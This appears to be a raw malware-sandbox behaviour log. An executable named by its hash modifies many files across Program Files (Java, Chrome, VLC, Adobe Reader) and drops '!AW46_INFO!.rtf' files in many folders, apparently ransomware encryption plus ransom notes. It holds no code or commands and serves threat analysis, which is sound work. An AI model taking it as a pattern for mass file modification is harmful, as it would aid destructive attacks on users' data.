7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\nacl_irt_x86_64.nexe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ro.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoDev.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ko.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\uk.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\notification_helper.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\browser\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\am.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sw.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File 